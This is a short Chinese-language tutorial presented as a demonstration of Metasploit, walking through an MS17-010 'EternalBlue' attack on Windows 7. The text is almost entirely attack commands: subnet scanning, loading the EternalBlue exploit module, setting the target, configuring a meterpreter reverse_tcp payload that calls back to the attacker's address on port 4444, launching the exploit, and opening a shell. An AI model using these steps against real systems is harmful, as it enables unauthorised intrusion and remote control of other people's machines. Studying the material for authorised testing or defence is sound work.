網路服務滲透攻擊
通過 MS17-010 “永恆之藍” 來給大家演示一下MSF使用
@ 啟動MSF
[msfconsole]
@ 搜尋MS17-010 模組 win7
[search ms17_010]
@ 切換到 use scanner/smb/smb/ms17_010
set RHOST 192.168.0.1/24
set THREADS 50
進行掃描win7系統
@ 使用“永恆之藍”模組
[use exploit/windows/smb/ms17_010_eternalblue]。
@ 顯示模組詳細資訊
[info]
@ 顯示受到該漏洞影響的作業系統
[show targets]
根據要滲透測試的目標作業系統型別,可以使用[set target id] 設定。
@ 顯示模組引數
[show options]
@ 設定滲透目標地址
[set RHOST 192.168.0.106]
@ 顯示可用payload
[show payloads]
可用的payload 有很多,我們一般選用meterpreter 框架下的tcp 反彈連線的payload。
@ 使用payload
[set payload windows/x64/meterpreter/reverse_tcp]
@ 設定payload 引數
[set LHOST 192.168.0.105] 本地地址
預設埠為4444。
@ 滲透攻擊
[exploit]
@ 檢視許可權
[getuid]
@顯示meterpreter
shell